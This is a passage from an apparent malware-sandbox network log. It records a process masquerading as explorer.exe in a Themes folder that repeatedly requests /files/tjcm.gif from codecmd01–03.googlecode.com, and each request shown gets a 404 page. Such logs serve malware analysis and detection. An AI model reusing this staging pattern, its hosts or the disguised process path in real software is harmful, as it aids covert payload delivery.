                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:36.164623022 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      134192.168.2.549848108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:36.546689034 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:37.265278101 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:37 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:37.265335083 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      135192.168.2.54984974.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:37.647275925 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:38.324158907 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:38 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:38.324203014 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      136192.168.2.549850108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:38.664432049 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:39.371073961 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:39 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:39.371222019 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      137192.168.2.549851108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:39.751574039 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:40.458523035 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:40 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:40.458647966 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      138192.168.2.54985274.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:40.857554913 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:41.571090937 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:41 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:41.571377039 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      139192.168.2.549853108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:42.082923889 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:42.742335081 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:42 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:16:42.742405891 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      140192.168.2.549854108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:16:43.200114965 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:16:43.874191999 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:16:43 GMT
